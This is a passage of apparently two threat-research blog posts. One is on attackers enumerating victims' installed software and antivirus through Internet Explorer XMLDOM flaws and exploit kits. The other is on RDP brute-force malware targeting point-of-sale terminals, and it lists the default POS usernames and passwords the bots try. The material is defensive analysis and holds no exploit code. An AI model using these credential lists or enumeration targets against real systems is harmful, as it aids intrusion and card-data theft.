Microsoft Office (all versions) WPS (Kingsoft Office) Winrar Winzip 7z Adobre Reader (all versions) Skype Microsoft Outlook (all versions) Yahoo Messenger (all versions) Flashget Thunder Emule Serv-U RAdmin UltraVNC pcAnywhere RealVNC Fetion Google Talk AliIM POPO ICQLite ICQ Tencent Messenger Sina UC QQ BaihI AIM Microsoft Messenger Windows Live MSN Windows Media Player (all versions) SSReader PPStream Storm Player TTPlayer Haojie SuperPlayer Winamp KuGoo UltraEdit Sylpheed ACDSee Photoshop Foxmail Gmail Notifier Windows Live Mail Adobe Media Player Flash CS Dreamwear Fireworks Delphi Java VMware Tools Tracks Eraser Microsoft Virtual PC VMware Microsoft ActiveSync Microsoft .NET PGP CCClient DriverGenius Daemon Tools MagicSet Baidu Tool Foxit Reader MySQL Server (all versions) SQLyog Firefox World IE TT IE Google Chrome Maxthon 360 IE Opera Safari SaaYaa GreenBrowser Security software detected:

Microsoft Security Essentials AVG 360 SSM Keniu ESET NOD32 Skynet Firewall Kingsoft Norton Rising AV Kaspersky JingMin kav Mcafee BitDefender AntiVir TrendMicro Avira Dr Web Avast Sophos Zone Alarm Panda Security They also used this code snippet to detect Adobe Acrobat Reader (English, Chinese and Taiwanese.)

Finally they were also able to list the patches that were installed in the Microsoft platform using a predefined list of patch numbers:

2. Microsoft XMLDOM ActiveX control information disclosure vulnerability

Another technique we found is being used by the Deep Panda actors.  They usually use this code in waterholing campaigns to detect specific software installed on the intended victim's system. It exploits the XMLDOM ActiveX to check for the presence of multiple files and folders:

This vulnerability was disclosed last year and it affects Internet Explorer versions 6 through 11 running on Windows through version 8.1.

Software enumerated includes most of the Antivirus and endpoint security products on the market:

7z AhnLab_V3 BkavHome Java COMODO Dr.Web ESET-SMART ESTsoft F-PROT F-Secure Fortinet IKARUS Immunet JiangMin Kaspersky_2012 Kaspersky_2013 Kaspersky_Endpoint_Security_8 Mse Norman Norton Nprotect Outpost PC_Tools QuickHeal Rising Rising_firewall SQLServer SUPERAntiSpyware Sunbelt Symantec_Endpoint12 Trend2013 ViRobot4 VirusBuster WinRAR a-squared antiyfx avg2012 bitdefender_2013 eScan eset_nod32 f-secure2011 iTunes mcafee-x64 mcafee_enterprise north-x64 sophos symantec-endpoint systemwaler systemwaler-cap trend trend-x64 var justforfunpath vmware-client vmware-server winzip 3. More XMLDOM vulnerabilities

At the beginning of the year we found a different method being used in combination with a Zeroday vulnerability affecting Internet Explorer (CVE-2014-0322) targeting the French Aerospace Association. In that case we found the following code snippet.

The attackers were using a similar technique to detect if EMET was present on the system.  If EMET was detected they didn’t trigger the exploit since EMET was able to block it and alert the user to the 0 Day and diminish the attacker's effectiveness.

A month after the exploit code was made public we detected the same technique being used in the Angler Exploit Kit. They were using it to detect Kaspersky Antivirus.

In recent samples of the Angler Exploit Kit we have seen an improved version where they added detection for TrendMicro products.

In this blog post we have given an overview of the different techniques attackers are using to enumerate software running on a remote system.  These techniques can give attackers information that they can use in future attacks to exploit certain vectors based on the software running (or not running) on a system. In addition, we've illustrated ways were cybercriminals have adapted and copied techniques used by more advanced attackers for their own purposes.

References:

Vulnerability in Internet Explorer 10.1

XMLDOM vulnerability

URI Use and Abuse

Angler Exploit Kit 

        [Less]
Posted about 1 year ago
Every single day our automated systems analyze hundreds of thousands of malicious samples. Yesterday one of the samples caught my attention because the malware started performing bruteforce attacks against Remote Desktop using certain username ... [More] and passwords.

MD5: c1fab4a0b7f4404baf8eab4d58b1f821

Other similar samples:
c0c1f1a69a1b59c6f2dab18135a73919 
08863d484b1ebe6359144c9a8d8027c0

Once started the malware copy itself to \Documents and Settings\Administrator\Application Data\lsacs.exe and starts the communication with the C&C sending data about the status of the bot (number of hosts bruteforced, packets per second, number threatds, version, etc).

and the server replies with a configuration block containing:

- Login/Password list to use during bruteforcing

- Timestamp

- List of IP Addresses to attack

- Number of threads to use

- Interval 

As you can see some of the user/passwords that they are using (pos, pos1, pos01, shop, station, hotel, atm, atm1, micros, microssvc) are the default ones commonly used in Point of Sale terminals by retailers and businesses all around the world.

The control panel of the botnet is also hosted in the same server:

This is not new, we know cybercriminals have been using this technique to compromise Point of Sale systems for years. Once they gain access to the terminal using one of the default credentials, they upload a second stage payload commonly known as a memory scrapper that is a piece of malware that searchs for credit card data in memory before it has been encrypted. Some examples are:

- BlackPOS

- Decebal

- VSkimmer

- Alina

- RetalixScrapper

- Dexter

These pieces of malware are able to extract the credit card data from the terminal and exfiltrate the data to the attackers that will then sell the information in the black market.

When it comes to detect the infection of a system in your network, this is how our AlienVault Unified Security Management (USM) will detect a compromised assset in your network:

 

USM is able to detect both the communication wit the the C&C server and the network activity that is generated when the malware performs bruteforce attacks against devices on the Internet. It is worth mentioning that the C&C server IP address was already in our Open Threat Exchange database and the correlation engine used that information to generate an alarm about a system compromise.

 

 

If you want to try yourself you can download our Open Source SIEM - OSSIM or the Free 30 day trial of AlienVault Unified Security Management (USM)

We have shown how these threats can impact companies using Point Of Sale terminals, specially those retailers and medium and small businesses that don't have visibility into the systems that are part of their networks and handle credit card information.

Some recommendations to protect against these kind of attacks are:

- Change default credentials of POS systems

- Configure an access control list

- Keep your software up-to-date

- Install an Antivirus solution

- Centralize and monitor the logs from your POS systems to detect potential security breaches

        [Less]